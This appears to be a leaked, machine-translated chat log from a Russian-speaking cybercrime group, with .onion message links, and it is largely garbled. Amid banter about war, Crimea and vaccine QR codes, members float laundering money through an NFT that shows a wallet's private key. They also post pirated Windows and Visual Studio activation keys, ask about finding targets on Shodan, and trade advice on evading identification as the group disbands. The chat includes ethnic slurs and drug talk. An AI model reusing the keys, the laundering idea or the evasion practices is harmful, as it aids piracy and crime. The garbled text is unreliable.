good luck and profits to everybody! what did you take? a spear for a house in the neighborhood, that's life. what did you take? i'm out of the way. you could do a lot of it, it's not fair. in the wild times.....we earned what we could:D My parents paid me until I was 16, so you didn't explain how you can earn money to rent a house when you're 14. We're so eager to get a job @kermitKeeping us out of Chechnya without a job. They're so fucking eager, no one wants to go to Russia. No one has told me about the job, yesterday the router died, but i got a substitute as always i restored the city i saw yesterday, the DnR announced evacuation at gas stations etc. i have no button B here i bought not a keyboard i'm a fuckin queue right now a guy wrote me in some city of the DnR announced evacuation of the city but i don't write it i don't offer it angelo aha the face and i would write a list you fucked up something?00You were earning good money at that time, how can you make money when you were 14? Kids are good now, they can do webcam, it's bullshit, tell me more, I'll say no more) I've been earning money in KC, now I need everything in life and where did the money come from? You were 14, fuck it, I was 16 and rented a house and lived) At 14?Do not live with your parents! Kermit, we move our parents back and live our lives like 50 years + not kermit it's not bad, we get it, do not worry, I have changed my keyboard, I write here as it is)))))*kermit what parents kermit?look how good you are now a parent should offer a choice, give the whole range of dovolvozhennym not impose their own with some fucking fantasies they live in their narnia never know if seriously do not know at all a parent rarely knows what is best for the child it sucks and you have a choice so I had no choice that my choice worse than yours that I did not right at 14 years I did not decide fuck all right?thanks to all my friends !!! you really lan)))) go tell my parents that @mitzi congratulations you fucked up the most fun !!! @mitzi health little guy !!! what were you doing at 14 years old kera, jesus chilo> and you looked handsome
and the acetone pilsilmilo damilo))) named mashkaa and he was born half-dead and right February 14, handsome, I had a fiancée here I'm a grandfather but a fucking weak kid
but we'll do anything to live
no smiley faces. i remember acetone for a bet. ....lolbikes fishermenda storytellers you fuckin' swallow like a konya thought, you mutant me such men somewhere stole a sign "working hours from 9:00 to 22:00 "then the burn the main thing is not to inhalepokhutil blin97% still ahahoge happensa how could you clean drink here I have other non-Russians cough all) pokh who you are and what covid will do his problem moving in timeazatoy other problem is solved clean pils do not helpNot that you drink.. There's men outside the window getting hardened, every day at 90 degrees and they don't get sick! Everybody gets sick with fucking prz <- 130aacermit snot flowing then fucking coughing snot and runny throat?i got everybody sick, i fucked up with a phaser, half a year not omicron[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=EKwQLyCmsPd9D34rB) yes here micron, we got 35smag and fuck up stafaedayyou're an inventor )Put up a picture in the nft sale where you can see the private key of the bitcoin wallet. This is a way to whitewash )Merch ru cybercrimeando write nftoooo, in the theme of air "air to sell" Well by the way yes))) Fucking hell. they'll give you emission quotas. lolDecarbonizers generally took the course against the economic stability of many countriesWhat about reasonable from an economic point of view - yes.) so it is smelted, not smelted from ore- Izya! What's going on in Ukraine?
 - Seema, it's a complete madhouse! Russian troops surround a Ukrainian military unit and shout: "Surrender! "And from there they say: "Russians don't surrender! "

A somewhat sad anecdoteMetal has long been melted by an elketromagnetic field.Well, the course towards decorbonization does not cancel the need for it for production processes. Unless power plants and other places will get rid of it. But for example in metal smelting there is a lot of it needed and there is simply no way to do without it in a reasonable (from an economic point of view) way. But the world movement is now on decarbonization. Coal is a great resource, mined by cheap miners in the Donbass, but no one needs it for fuck's sake because of the course of decarbonization. So there is no more than a buffer here. to take something else, deal with what's left of the factories, I think there is only one foundation left). #https://www.youtube.com/watch?v=pUCPl_lt2K8 #
*By the way, they make starch from potatoes less often now, because it's more convenient to make kukuruza. By the way, Lida beer is cool. Although it's not beer, but it's the coolest in the heat. Especially there's beer that tastes like kvass, but strong fucking planesybir* from donbass to sydir so taka steelworks we have in siberiazavod there's a lot of defense industry left over from the USSRa I like brie[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=o5qEeGBtZnzuA4v3m) well I dunno where to get it. I just remembered the news that the dnr was selling it everywhere and there were buyers. There's great coal for the steel industry.  That's why they used to take the ore to Donetsk region for smelting.
on the collars, the oselomersy cheese brest lithuanian Where did the starch from the potatoes go ?shrimp and only potatoes and that shit is awful isn't it? that Hamon i can't see to death the fucking miners from dnr and lnr ready to die in mines of the great empire ?what the fuck is the price of delivering a video, not like your static videos. where to deliver it? @gelmut what the fuck from dnr and lnr? yes i remember it).something comes to mind.by the way, i still have a video from aski symbols - a moment from the matrix where neo dodges bullets.  It was very popular about 15 years ago. Quit...I have more !ha !wo........................................."--~*'¯.......'
...................................... ("-~~--"¸"¸"¸Ã'Ì
....................................-^"¯ : : : : :¸-¯"¯/'
...............................¸""-^"¯ : : : : : : : '¸"",-"
**¯¯¯'^^~-"""----~^*'"¯ : : : : : : : : : :¸-"
.:.:.:.:."-^" : : : : : : : : : : : : : : : : :"-"
:.:.:.:.:.:.:.:.:.:.: : : : : : : : : : ¸"-^¯
.::.:.:.:.:.:.:.:. : : : : : : : ¸""-^¯
:.' : : ' : : : : : : : ;¸""-~"¯
:.:.:: :"-"""***/*'ì¸'¯
:.': : : : :"-" : : :"
.:.:.: : : : :" : : : : ,
:.: : : : : : : : : : : : 'Ì
: : : : : : :, : : : : : :/
"-"_"_::::_"-*__""~"pigeons, bums, ugagde this is all friday pre-paid gambling waiting? We are just warming up, before serious conversations why are you starting to get sad in the evening?In border settlements, almost everyone has relatives "on the other side." I thought they were thinking with their heads, not their asses.
1) a buffer between Russia and a potential NATO member.
2) There is a lot of good coal there, and the main thing is that it is close to Russia, not in the arsehole of the world like Siberia
3) In fact the whole population there is Russian-speaking. In the DPR they speak Russian better and more often than in the villages of the Rostov Region.
4) The access to the sea is bullshit, the Azov is a swamp, muddy and shallow.  The seaside infrastructure 10 years ago was in complete shit.

P.S. Every summer I was in the Donetsk region and saw exactly what the fuck was going on there. Everywhere you went there was devastation. After the Soviet Union, perhaps only when Akhmetov took everything into his own hands (bought it up) did it begin to prosper. I don't give a fuck who you are, whether you are a lip-smacking nigger or a cheeky Khokhol or an Asian with a stupid penis - the main thing is that you are a good man, he covers his shoulder straps, but you guys are just between us.the main thing is not to go to waa, you will see turtles and whales and the endless space!i'll wait for the train and go to the edge of the universe i'll go look for a box at the train station and fight with the homeless for it i'm always on the topic@thomas got the joke) and that's it, toby the cunt i'm in barscajah no allah is there i'm just there the earth is round tell you what to say, i'll get fucked like a mad dog tomas you say that in saudi arabia some guy remembers a joke where there are corners?it's round... what do you guys do, take a yoghurt and go to sleep... they said you can find a job anywhere in the world... they said choose who you want for organs... you know what? or fall into space... if I hadn't burnt down, I would have taken a job as a truck driver. and I would have fucked around the desert in a truck... what would you say about that?otherwise everyone in australia would have fallen into the sky and let's just say the earth is not round let's be broad-minded elephant trunk it doesn't matter what it is it's a dick so you shouldn't make any conclusions before you get there or lying there? they told me in church she's standing on a turtle don't you know? Why "or"?) @thomas don't escalate. we don't need a chorus[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=23JxKNpLtMQZhABFs) or flat we need to protect the moon from nat bases ahead of space...only earth is round...and then if we take a new territory to shit there because we're an empire to shit where we live I don't like our relationship don't believe in love at a distance why aren't you there?I like Gelendzhik and the whole Krasnodar Territory, it's fucking great there, you fucking pigs can't live in shit, people can't do anything right, they've fucked everything up. I like Crimea, it's beautiful, so shut up guys, fuck your Crimea, I have not lived in Russia for years and I am fucked, I remember coming here for posts on FB, summer is coming soon. Why do you need a crib? I told you that I didn't need a crib in Crimea. I got a bad Internet connection. I don't need one. I understand our tools, like Peter the Great - fuck off and earn your own fucking money.
But you have to pay for your food and rent! Oh, stop flirting with me and not Ilona, I'm not ready to talk to anyone, Angelo should be put on the phone and let him represent the Savings Bank.the moon and Mars, phobos and demos - all russia :sunglasses: i will not say about israel, but in california fort ross was exactly noticed Kosovo is serbiaDamn it alaska, when is the payday guys? @frances But kosovo is not russia, pray for the leader! The Maldives and Israel!This is Russia)) You are out of your mind, people in Crimea are worse off. It's true, we'll all be locked up fast for this kind of talk. 20 years, our cops will always find something for 5 years!
Frodo is a halfling with hairy legs %)fuck everything he was suspected of making explosives and found gunpowder that lida there it's not just about that lol```
https://ixbt.games/news/2022/02/18/kibersportsmenka-zayavila-cto-u-muzcin-rostom-mense-170-sm-net-celoveceskix-prav-a-lgbt-soobshhestvo.html
``Dominated, 5 years 5 years was given to a teenager16 years old guyagainst a saburbon in general I got fucked up by the news recently, dude in maycraft mined an fsb buildingfrodo normal dudeunder a chevy suburban not all midgets are bad midgets and dick in dreams under a ford broncon cunt hear the dwarf people with small stature always have problems with their loins - grandpa forgot to take pills, so he gets mad. it's just like they wanted people in the Crimea are living worse. people do not need Crimea. people eat less.it's cheaper to go abroad to rest. What the fuck is the dnr and lnr krym being deprived of it and what's the point? i don't fucking believe it, i don't want to go to the sea. it would be fucking better if the maldives or the caribbean were deprived. in empires you do not ask questions like that.there are no activation keys for 10 kilometers ? i found my activation keys, they all valid, go ahead and take them.
Windows 7 Professional with SP1 - Windows 7 Professional with Service Pack 1
```
PKeyConfig : Win 7 All
 Key : XF69Q-T9G2R-VVWCC-FG7QY-DGXM2
 Key Status : Valid
 Product ID : XXXXX-034-7568835-86136
 Extended PID : XXXXX-00172-034-756883-03-1049-7601.0000-0492022
 SKU ID : 9abf5984-9c16-46f2-ad1e-7fe15931a8dd
 Description : Windows 7 All Volume Editions Volume:MAK
 Edition ID : Enterprise;EnterpriseN;EnterpriseE;Professional;ProfessionalN;ProfessionalE
 Sub Type : X15-39049
 License Type : Volume:MAK
 Channel : Volume
 Crypto ID : 172 (ac)
 Activ. Count : 13
```
Windows 8.1 Pro - Windows 8.1 Professional
```
 PKeyConfig : Win 8.1 RTM
 Key : TWJG2-NX794-PF3P3-THKYW-29WK3
 Key Status : Valid
 Product ID : 00261-80362-90494-AA837
 Extended PID : XXXXX-02618-036-290494-03-1049-7601.0000-0492022
 SKU ID : 354d964a-56e7-43c5-a93f-287a7a750bd4
 Description : Win 8.1 RTM Professional;ProfessionalN;EnterpriseN;EnterpriseN Volume:MAK
 Edition ID : Professional;ProfessionalN;Enterprise;EnterpriseN
 Sub Type : [Blue]X18-95503
 License Type : Volume:MAK
 Channel : Volume
 Crypto ID : 2618 (a3a)
 Activ. Count : 50
```
Windows 10 Pro for Workstations MAK
```
 PKeyConfig : Win 10 RTM
 Key : 9X72C-WNHPV-4683W-PGQYF-YTDGY
 Key Status : Valid
 Product ID : 00331-20021-51452-AA212
 Extended PID : XXXXX-03312-002-151452-03-1049-7601.0000-0492022
 SKU ID : 49cd895b-53b2-4dc4-a5f7-b18aa019ad37
 Description : Win 10 RTM Professional Volume:MAK
 Edition ID : Professional
 Sub Type : [TH]X19-98796
 License Type : Volume:MAK
 Channel : Volume
 Crypto ID : 3312 (cf0)
 Activ. Count : 38
No, with nuts, you'll get sick of them in 10 minutes, you'll have to get nutmeg from @gelmut and today I dreamt about a redhead, I didn't want to open my eyes But the budget is limited, no money for Lsd I want chicks to dreamtttttt only Lsd will help And you told about it You dreamt how to clean it all do you want more?)Two weeks ago I woke up because the VPS is dirtyI dreamt about detektsThat's easy, just think about work))) @elroy but keep thinking about work! You broke your mind and think about work from your apartment, where the money is?)) You do not need the key to call of duty vanguard, you do not need the key to ..... ))):rofl:okay, I need a key for call of duty vanguardNo all, unfortunately he has everything !
Visual Studio 2022
Enterprise :
VHF9H-NXBBB-638P6-6JHCY-88JWH

Professional:
TD244-P4NB7-YQ6XK-Y8MMM-YWV2J
``Express never screams 2019 and 2022I have VS22 enterprice. I gave her the key and ok. and let's you give the key to enterprice? who uses VS22 Express? after how long it starts screaming - "register me"? thank you for your attention Well, yes, the bug corrected the fundamental) masseurKa I do notDa. Here I stoboi agreed)))) and masseur personal with our profession needs a maxibar:thumbsup:better the mini-bar as it is convenient, I have a mini network at homeBut why> I pointed my own bridge in the browser I do not get without vpn, apparently the provider blockedpoblozhnyutsubtu only with snowflake but very slowlywindows + vpn + tor.Googling may know pod ubuntu I unfortunately do not know the settings that I threw above for my bridge with the settings abovetog bundle should be run and not tor browser to kak? had to turn around myselfsnowflake at me barely works, I can not even come here to chat with her everywhere I asked
in the tor browser, on the site and on telegram.
It only works with snowflake.
i've been pulling this lollypop for 2 days i just copied it in the folder somewhere in my browserServerTransportPlugin obfs4 exec C:/Users/user/AppData/Roaming/tor/obfs4proxy.eheya in my browser i pointed my own bridge:)you do not understand me, i myself requested the bridge settings on torus? i think i should get it from the torus site, but they are all broken there@homer but where to get the bridge?.168.1.153 -> you have a different ip in your subnet understandably, or localhostminterestingly it is config? and in the settings of the torus browser -> specify your bridge:
192.168.1.153:5600 if you are interested, here is my torrc, maybe someone will need it
SocksPort 0.0.0.0:9050
HTTPTunnelPort 0.0.0.0:9080
GeoIPFile C:/Tor/Data/Tor/geoip
GeoIPv6File C:/Tor/Data/Tor/geoip6
BridgeRelay 1
ORPort 5600
ServerTransportPlugin obfs4 exec C:/Users/user/AppData/Roaming/tor/obfs4proxy.exe
ServerTransportListenAddr obfs4 0.0.0.0:5601
ExtORPort auto
ContactInfo no@name.com
Nickname Nonametorrc file is there? There's probably not much difference. I'm on Ubuntu. How do I configure it for the TOR bridge?:) What OS? WIN 10 What's your server on? My internet was down yesterday... I couldn't figure out why... for about 10 minutes.
Turns out I knocked out the router's power with my foot :grin:hi, everything's fine now... I had it last night... I had to use a torus bridge to configure my torus browser. It all worked. I had to start my server with torus through vpn. I just shut everything down a couple of days ago. Does anyone else have a toad that's been acting up? It always shuts down for me. And I have to plug it in manually all the time. It's most likely the torus...there's a chance the next paycheck will be more in bits...ok, is it ok? does anyone here know how to build macros?
I saw the same thing yesterday.
Not only that, in the middle of a conversation disappeared otr connection spontaneously, turned on, it turned on, but the messages without the keys.
admins, check the chatmages I have only one input[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=KTLNauWn5yabFGYZ9) or do you have S3 Trio ?) yes to any one and a total of 4 monitors can connect to my video game 4 can connect to it 3 display ports and 1 hdmi I have an old gtx1060 now to buy a graphics card, you have to sell your kidney[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=x7htRcdwFjLkC67MJ) and where to plug it in?where do you want it? - left - internet and documentation, middle - development environment, right - all the chats (I have more than one) monica monica, suck the elephant's dick. fuck, i remember the song (for the chat, buy a 3rd monica. i also like two monicas from developers..blogger me chat on a separate monitor and I always see you all)) I have the sound off it was a check for online :rofl:thx) yes, in place it@all but where is the menu to enable apr is missing? no, all normal redmine lies? @lawerence knock @collin this timlid on the BC. He will tell you how to do it.gosusluzhba - the national heritage (c)) Some archive is thin.what is it?)I just wondered if their archive is 7 gigs.everything, you can fine your neighbor in gosusluzhba for fucking parking in front of the house (which is impossible to walk with a baby carriage), for 5 million rubles))) ahahhhttp://habr.Com/ru/news/t/598121/so yeahVS 2022 came out or what? thx+pingpull - normal.@alik me too ok, hiGit fell again? ok dudes,
We need to remember about the Russian mountains and the
Belarusian sea:laughing:eblinkin? or american mummy? or that bloke with the fucking haircut?) where does the troll live in a cave under the mountain...fat green dick)) Putin probably gave him a whistle in his, and HERE is this clown? Psaku's duking it out?:joy:aada he was fucking playing with his dick :joy:at points like he's disturbing your life or something like that from his non-voter, so what are the complaints about zelensky? `https://pbs.twimg.com/media/CqhlI5ZXEAAnETF.jpg`@Garfield even under Yaatsenyukh who got money and got the fuck out, he dumped everybody and Kuev) the fuck you are doing for other people's money he earned his conditional billion and he does not give a fuck about anything now)) and the shit that is going on now started back when Powder started, if such a drunkard is fighting the house I can send a couple of ties:laughing:I think he looks nice you are not a resident of ua what can you say against Zelensky?It's better to be a Stalinist than a Zelenist :joy:Noah screwed up this ark better to sink itEach creature should have a chance to get some. Are there Stalinists here too?
Stalin is a sucker!
What's wrong with what I said? Or has the Eurocyclone got a couple of years to spare? What did I say? The flies are not ripe yet What's wrong with me? What's wrong with you?Kermit, what did Angelo treat you with? Crimea is Ukrainian! The LNR and DNR are Ukrainian land! @bennie the toad is blocking requests due to lack of authorization.
pokat forgot to slova ukraina! and some good coda to me too silent)i promise more russophobia and anti-soviet if there is my contact. pinging then it's about zhabochete not alei threw requests to him, on requests @bennie something your toad is not alei, let's all be accurate!
All my friends, I was glad to work with you, everything will be fine, see you soon! And yes @bennie is gaining a team, who knows him go to his chat room@demetrius request to disable the removal of the PS and general chats for more days, there are people who are on vacation, etc, let them readDuring understanding, our given infrastructures live, the last days at best 1-2 days, make becaps.
Remains to exchange cats who's with who, Friends do not lose yourself
Piss and fuck our wars with our brothers,
Next we'll do everything, I'm writing from the English keyboard and typing by memory, sorry for the errors) No wagons and all sorts of shit, toks as a priority So, friends, swap pals is the rule!
OTR, PGP, sock-socks, do not deanomimym ourselves and their own, in the twist here new contacts do not throw, we'll all be fucked.
Knocked from the freshly-registered toads as an example.
We exchanged keys Deleted all!, further we sort it out ourselves.
If you teach someone how and what to clean, then come to me, here in the L.S. The artist there will be helpful to anyone?авторизируйeyJhbGciOiJB24fD44BRFvYYz5iboO/9jtdBrFJujpDAFJz6cMPFcMrxn3djYo0jxfOrE8RsjVSyjEiM1DKuZxcgmBk3kB3oVfoqDyZY5XNMxQ7KdqrMjy0NFcaxzS8EFQEDrMCPgCJZ5if0QCHshjMaTXFuJOEXEnXsF2RoGBabg6hofVOldlDTGtE7l8RBj36qScd1jenyNtNPbBZTTV/sjTEEkqySSTsqw7K1Ut+cS3gQ4Z2FWwIw/7nCXPKTqlprfRcXJ97uUIvqThcLB75rkzYer4+vKQ==eyJhbGciOiJBnvdSVWZVIAyb6BCHj+A030+3fY2BN5b5v+J7q41qgQ7np0ITFy93e5d6mnyau/iIBpsm+O3LwBT0bLOnkF0m5xj5Qzscl+9BvAwg9HzSjjwHdCImZfaxJ0AEm0n4kEx6rAPIIwoJfxQfTrN7srEIlC2HARIiDwuiYSDSS5VJq878AL6UxOILSllaFp/4L+12E4Zo2Z8ERV/BZzJ1JQLKjg==eyJhbGciOiJBYUFMMP1N653ZadUlgKxQ8yuV+oiVO039+I5VsvyqeMuRzC6ntne/mZAe20qnGNOKfyKVWkSmYaEea4tW5JvmWmD/sfQx3wqJ58g3XtmABSaWrW+pOsnME3hj5WDPsydAPKwjNFN4Za+OxPLJaRXSHmgtxlsAMrkB+VO1YdhsulU=++testрекомендуешь ? I'm sorry, but I'll pass.) i'm old school@angelo then get a 2 in one: SSDrapon :grin:yeah, that's a fun thing to do)>would get a hair dryer and heat your tubes
fuck, I was thinking about the wrong hairdryer :D would have a hairdryer and heated his tubescorrsaira I would have assembled a water bottle)@weldon well in seccoe I am not as rare guest),but worth a prucha would take 2[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=A8GXm79uWrx4okN2c) and 1 gigabyte enough for you? :Dtay not in surgery[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=uBayLx3MGXH4GiFWW) don't get it... so you in dns/rbts/kins or in a sexshop you take presents?) like among hvm they're pizhete all in general samsung is very fast 2 times slower than Kingston i have a satashny samsung SSD 860 EVO M.2 1TB haven't decided vaginaa I will take nvme Samsung 980 Evo PRo 1Gbvara SSD Kingston SXS2000 1 Tb USB-C )guys all bought yourself a New Year presents ?! and then all the rest !on my birthday I will be in the shit ! here's the joy ! it's definitely something good)@angelo, the new year is coming :)write me something good too@kermit wrote in the toad youhslolt once and there were sellers on damagetobe buy, scrub some how to get buy or off?@all guys, and no one knows how to knock out an ak on shodan? will not write any addresses and urls in chatsnoskolno how much breadcrumbs to take? dry the oars? gy__________(")
_______"""""
_____ """""""
___""""""""""
___ (░░░░░░░)░░░)
___(░(░"░░"░)░░░)
__ (░░(░░●░░░)░░░)
__ (░░░░◡░░)░░░░)
_""(░░░░░░░░░░)"
_"""(░░░░░░░░░)""
"""" ""(░░░)"" """
"""" """"""""" ""
"""" """"░"""" ""
(░░)_ ▓▓▓▓▌▓▐▓▓▓_(░░)
("") """"""""""" ("")
_____█████░█████_▓▓▓\
_____"""""-,"""""▓▓▓▓▓)
_____"""""-,"""""▓▓▓▓▓)
___(░░░░░░)(░░░░░) ▓▓▓▓)
______(███)_(███)▓▓▓▓▓▓)
____ ("""")_("""")▓▓▓▓▓)
I hope it's a gimmick what's the santa clowns7)We'll wait for @silverWere you seeing this gimmick or not? what's the santa clowns newbies? @elroy have you seen it? hello all nightmins are on line here? https://siasky.net/LAAtPqyAbVU0FKTHc14xH1XNqDwNsvDwHKPPyhdqDc8Onwthx mate+test@ganesh pm me, plz!need to sell these PR_codes to Alla Borisovne even if 44*44 (that's the size at "2vvapvapyukekekgospichvaprasprsprlj4565675aprasprj445va") 4 milion) or laysag chips, or homer simpson so you can be a Philip Kirkorovma no limit there, and the world has 9 million combinations ?i'm telling you, my wife asked me to scan my code before entering the mall... I'm telling you, my wife asked me to scan her code before I entered the mall)... Then I saw a blue homeless guy walking around in the "diamond holding")) Oh, those bloggers...and the blogger went to 3-4 of these stores on the code from a pack of chips on YouTube there are videos where the guards check these codes just eyes blin skohil in KB, the receipt is the Quarkd, I decided to keep as a memento) I wonder, are there kuarov recognition from the screen, like screenshotilok? do not yuse smartphone, and directly from the computer screen? can mold everything you want! :)```
https://qrcode.tec-it.com/ru/Raw
"it's scanned. Fuck you!
WITH YOUR INOCULATION!

All the institutions are allowed to pass! cuckold code is also normal, but not on the subject) yes! RIGHT! I read some cuckold at the beginning :) it's genius simple cuckold, good nameo, this cuckold is correct! by whom??? sick@all People. And where did @frances go with our wp? https://siasky.net/ZACZJ8vKDNK2f8Rm52fv-qbi_kuTbPk0GMz_dXA1RaDacQпо hodu, the cuar checker is only at Reuben's..gosudarstvennas hope they do not check by such links some abracadabra is scanned from this qr-codablin)) dr and name from the ball. the essence is that they ljivat left, but valid certificates eto androlf) dr adolf not January 1 for sure i do not have a cell at hand, but this quarry checked as valid for adolfa they have all normal with signatures) well, we have the usual string) like the URL of some site mai gans ... wake up my dads :grin:what other cert, everything is generated by the usual string, ideally, the cert to generate these kuarabinen all factored in?i think they leaked it to a private private))) security certificates*scha, if i can find the link, krch in the netherlands leaked certificates for vaccination data, and there is a cuar code for adolf hitler with the status - valid certificateWhat we used to live oppressedThis is bad...i mean qr, not about the oppressed state of the russian people in the state)
I think this has been part of our firmware for a long time nowNo one has not invented a solution yet ) I think that it will somehow resolve itself when scanning the system )The qr code when scanned gives a link to the article about the Nuremberg Code in Wikipedia If you are asked for a qr code in the street, show this picture: https://siasky.net/JABaAaKwcf5LPhw_QPltQXIzL_YXPZS_LUk1b_I-8Fr1Ug oligarchize) all "popular" companies like even Gasprom, 51 percent, have long been not ours, not that it is not popular.
They have no erection, they just do what they say, we are a colony. What will they do when our Vanguards have an erection for the U.S.?
Maybe they will make war quicker for Malthusians... If condoms are bags of glue, then all the junkies in condoms used to stand in the basement...)) Remember that? Yeah, like in the 1990s But the blitzkrieg was a failure, people are not buying any "protective" measures.
Now the pro-Western bureaucrats will think of workarounds to implement Malthusian ideas.
The question is how quickly it will be introduced, only with a large number of violations of the law. Well, it will be soon, and only in a different format) More movies than my children put together) Remember "Kin-dza-dza") We will install the bells in their nostrils :laughing: There was a cyber punk movie where people changed each other's eyes. Then I saw a winter hobo in the ass, just walking around the mall, my wife somehow scared me... I thought they were gonna swab my ass and take a sperm sample. how fast will it take to implement and it's already been implemented? So they ask for a passport, and some people take a photo with a passport[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Mom4EWudGdphApDW6) What's the deal with what?
you can make 10 copies of Vasya Pupkin's qr-code
there must be some protection against fools - usually there is some gamadrill, who would like to see a square of Malevich with broken pixels) and how will you reverse it? they are stupidly in the database and check http://www.youtube.com/watch?v=q1e7BWdbrbw
well, for example, the reversal of devices is not clear how they check. but there are already devices that actually check that they all check, they check in the public services database?I am against all this crap, even against medicine, it is pure genocide, so why not pedal this thing here?..I mean all sorts of satellitesa it's understandable, it's all childish pranksvot and I say - orvi is not covidogo, flight of consciousness ... mine wants to factitiously, broadcast, sterilize, castrate, embalmed and mummify me) and all this is not her job ... we don't have such procedures) get high on their marijuana...(c) at least specify with what: heroin, desomorphine, satellite, solinu And seriously? who's been high?confused thoughts, remember youth, eternal happiness) the first signs like already)urgently faciniruyut)aha, with the words "Repetition is the mother of dementia" "not in your youth" already without _sorry_ ... not in your youth slips =):sweat_smile: "sorry, not there," in his youth with the girls, this phrase slips ...))) not there to write off)?)sorry, wrong place at 15 минeyJhbGciOiJBjPfOb5ySAOu1IRwzRdoZ/ODMdbm8rVQHfvvvCxuD3YIpgQtYEjrFs6kvPQSO9w/4HTWQuZ2rfUITOXnrUmdP3x9cDpVb+7fr/NS8BDNHy12KI5SFmMwTpxE5eyJZ8uY5s8JnzBAByKgRaMi9rbVkEn0OKuyjAzyy9mhT3+JuavLocqBsexQBQo8HR56vfujGeyJhbGciOiJBbf6KIz/ko6nFS/KxARiKlBf/el23Z5/7czk+EXg8RJegoNGyxKO4ofr+OEuF87sgj9DzavD6vet4gWhV9vdxYJ90dXTUqRXq278vhKDv2+Fu6o47neWeBBPP+bf6OxRsoLi/DpOJa58TfL4bP7YFNRwAHLas5uTESl5eAXtIgsCGKrPg3ELA4ZzHPWe/VjQGcDjM4Tiw0rIvXTvmlQfzcxfZ/NfUqsSKKJ2mi//QJ+jslXaTAF1SGomTY0PFsS4VcXyEcN1UeCaTfvBqFVkePVj7kou+1jjS9MJRnzcYOVzn//FQ+s00ubVv19J1GRe9FZiyBEA+jdVYcL4+06HCh1AWaLmkosnXbgMB0s2u0tD1aHE6Hy7Lmavucd687TOE0Tr3gEKXVM8MxBWficQT4pHkLlZOpx2/ZPzi8DZS2szGw98tRbNyBRWp6Z7cbtsqLd8edgrPpEELQTiGNJjrwY62BWsoGDH3OI6hXaPGRKIBQO6wcU8gBbSJa1bxluy/Fxviw+8822fi9nrAqVGHLsv9Ywvf2u7mCxYjtQfVQkn4Cc9rOyHOS4uuGdKRuGej3qZ7BJAkpCoLxhS3kVuiZWZBsUyAKSypQJyVxmxkdYpLGIcpVmHqVvjcEMGj9j0ZOd71EkPwhsP0vixnfwrEaP84SL7Q7IuKaOTtHlwOsySqauq8dKRnmqU0+1EEmu1geKx4yQo+mzZCxS3urkqHKF8zMgsjnyD4oq/SsgzZt2Wion8oiDY/ugPj9+ITGbYXUYyUewJRsQdrUVaMJyoRMnFX5WMsgqP81E I'm going to brew a stronger puerh..) and jabens, and rocket) well dar_chat works?pingeyJhbGciOiJBESwDFn5z64sUTWn/4hTsO7DWW/zaaSsCXnQaOkPtPclPfe+pf4/TGppyVVWMAUw/vbGvNnQd7dRiLD2WUFy8zm4VHOMIfJF6nwOD8Pd7gF6HwcCYPrTtH5HNbmgwPZDY++NUBOezUJtku5mV4Te2yQONQZrgNFymhh17GyCSxAEP8mjcj9J31d9in+tFCEN7eyJhbGciOiJBAyKkkuSBQcd/Nqy6QJ55+uLhYv4/yyUgTZjuyAQsZhk2BmxSjmEcR1hJ+y1H3plbS/Ad8gSXmMU49nu81Cw687x6T5tWBOYl9Ijp1t5FJh1NH2+iCGVru2RV+uqR7oHZkftUWRULtYycXDnE5PCRR3K60OaHumYCmhtgJQWTRmGRsGpXnn8KV5WSsVLAn4BWYTfYj4zERk7rBf80zROlOg==eyJhbGciOiJBvqyxT5OoKPm8I7jTlezRWQq/NgXXuHsOwNcHpEhl1M4MKt02WhytOot8TIowtkhLNV1s++q/9xY58O6R3PTb4j+/rrO2qbFtnYpkt3XvaMXrrqnYgT3iH2gj2avArCiM2yrg5SUsjZiT7UdIE+IXOp5dps1brmg34LSYE8Z0NIcQLenq30DsKzwUbahZbn6USng/Cj0ZjJATkjjOEypYrw==eyJhbGciOiJBSs6r6remiqpkDsOnSFOh8KDvTScCNKvGjEecUNLXTmdTB5blBVpFHxazvA1AmdfDZXforfWTNjzzChJY9XLweC2/h+0heMakuHz2iWbzr39jib6NUIk5xpjwazYmQIieUYTApBVa9iC9GbA+J/ecrJI3fPSvCjyprwpTj//D0TNQgXtLyPIdmIkDHpUPrcy//d2m3E7mgYjfL/YNsKzzwwkIy3UnH0MWUBhnSB3XZk0=eyJhbGciOiJBhcevPh5R3ciJMqTUJv+rS9VbQphsjedJ+UjDgm/gSFsGtIondnk2dlk3fTYW5ddCMcY/HZ60kQ+vIkxCDyVNElcAz2VgsjFHbjRG"mfberGaHnMGp1F94yRZmJc19o17ENahj8KkhRGR183C9fOiYMgzoIHV5ZoLSbzcJe6pLN8I1GgnwoOOuDMSDfL4nKVcmLrcfQucL2NlkXcEAxELJo9x6sOJO2ec6Q23yMqF28wNi/DD6CtXbzslRBLIchzXqDp7ssmjU3BX4AIyyq3NI2tY07n9zAm/x7tD6M2sOhwVTxfVlGNGGL7r25bpxy/jh31Z1JniWiTmpRGkTaw=="}{"$binary":"gAuS7ds2uUgSeyJPd/5z/cD03AOyNn6pUk0pWifPs2WOe9NsRMRFGDvG42Gc+TINODq+hLVkU2lcvAGj3bfzV0sQ5nscZLNa9xTpt0YDjxRk4uuw8Ki78nN6NZSsUHLu3VpvUs9dOFEAS2TqoXz/B58dUizS8eikvXMAWlqxM9lZLqQqE4RkvhvQNJty+2gd31vKwoRtOM3OhMJCibUHs+OqjP17AdBx0GJ8mf26xOMKpcyvRUy06wq3IrDtqb4wEFIrAaVQMfF2WMCZalKxbwhXD218c3+pu3HVbWfh34aXnChC29I8iZI88PHum15HlW9Kq7Yl9tG45QWHNv2n0LrrNiFqYDCgdMYYJIpFZdWPOEmX/V4fNb0WFCV38WjZBKL1N0pgSoWQmvxEfQFGNgH22apmPXvfZyp2rRFzeotUhx1/iHzEVsK4wJIQMN9lf2fDf8lT10xhiZfK5akQ4i